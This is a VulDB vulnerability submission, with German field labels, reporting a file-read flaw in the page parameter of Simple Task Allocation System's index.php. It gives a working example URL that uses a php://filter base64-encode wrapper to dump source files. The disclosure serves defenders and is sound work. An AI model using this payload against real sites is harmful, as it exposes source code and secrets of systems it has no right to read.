| Titel | There is a file reading vulnerability in index.php of Simple Task Allocation System |
|---|
| Beschreibung | The page parameter in line 77 of Simple Task Allocation System's index.php is controllable, and users can construct malicious urls to achieve high-risk vulnerabilities in file reading
http://127.0.0.1/php-sqlite-task-allocation-system/?page=users
can be constructed as
http://127.0.0.1/php-sqlite-task-allocation-system/?page=php://filter/read=convert.base64-encode/resource=users
source url:https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| Quelle | ⚠️ https://github.com/Pe4cefulSnow/CVE-Advisory/blob/main/uploadcve.md |
|---|
| Benutzer | Pe4cefulSnow (UID 34389) |
|---|
| Einreichung | 31.03.2023 11:32 (vor 3 Jahren) |
|---|
| Moderieren | 01.04.2023 10:39 (23 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 224724 [SourceCodester Simple Task Allocation System 1.0 index.php page Information Disclosure] |
|---|
| Punkte | 20 |
|---|